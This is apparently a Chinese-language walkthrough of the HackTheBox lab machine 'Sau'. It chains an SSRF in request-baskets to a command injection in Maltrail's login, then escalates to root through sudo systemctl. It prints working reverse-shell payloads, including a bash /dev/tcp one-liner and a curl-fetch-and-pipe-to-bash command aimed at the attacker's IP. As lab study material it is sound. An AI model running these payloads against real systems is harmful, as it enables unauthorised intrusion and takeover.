[渗透测试学习] Sau - HackTheBox

首先是信息搜集,nmap扫一下

nmap -sV -sC -p- -v 10.10.11.224 

[渗透测试学习] Sau - HackTheBox_第1张图片发现存在两个端口,55555端口有http服务,访问一下
[渗透测试学习] Sau - HackTheBox_第2张图片
获得线索request-baskets版本为1.2.1,搜索发现存在漏洞
[渗透测试学习] Sau - HackTheBox_第3张图片那么我们试试构造ssrf,create的时候bp抓包
构造参考

[渗透测试学习] Sau - HackTheBox_第4张图片直接访问http://10.10.11.224:55555/exp即可
(不过只是执行了url请求,没有内容。要想有内容把proxy_response设置为true就行)

我们这里直接按照步骤来(不抓包)
[渗透测试学习] Sau - HackTheBox_第5张图片
创建后打开点击设置,写入ssrf的url
[渗透测试学习] Sau - HackTheBox_第6张图片然后访问给的路径即可
[渗透测试学习] Sau - HackTheBox_第7张图片
发现是Maltrail服务,还有版本号0.53
参考文章

/login路径下存在远程执行漏洞,构造如下

username=;`bash%20-i%20%3E&%20/dev/tcp/10.10.14.32/1028%200%3E&1`

不过没弹成功,换成curl去弹
在本地创建shell.sh,写入

bash -i >& /dev/tcp/10.10.14.32/1028 0>&1

开启服务器

python3 -m http.server 80

然后nc开启监听,bp构造payload

username=;`curl 10.10.14.32/shell.sh|bash`

[渗透测试学习] Sau - HackTheBox_第8张图片成功反弹shell,找到user的flag
[渗透测试学习] Sau - HackTheBox_第9张图片

我们ls看一下发现有conf配置文件
[渗透测试学习] Sau - HackTheBox_第10张图片我们cat一下,得到信息admin和local的密码
[渗透测试学习] Sau - HackTheBox_第11张图片
sha256解密发现就是注释给的

[渗透测试学习] Sau - HackTheBox_第12张图片我们查看下能用的命令

sudo -l

[渗透测试学习] Sau - HackTheBox_第13张图片发现有/usr/bin/systemctl status trail.service可以用,搜一下相关提权方式
[渗透测试学习] Sau - HackTheBox_第14张图片用第三个(多简单)
先提升交互权限

python3 -c 'import pty;pty.spawn("/bin/bash")'

然后执行

sudo systemctl status trail.service

再输入!sh得到root权限
[渗透测试学习] Sau - HackTheBox_第15张图片得到root的flag
[渗透测试学习] Sau - HackTheBox_第16张图片

你可能感兴趣的:(渗透测试学习日记,学习,安全,web安全)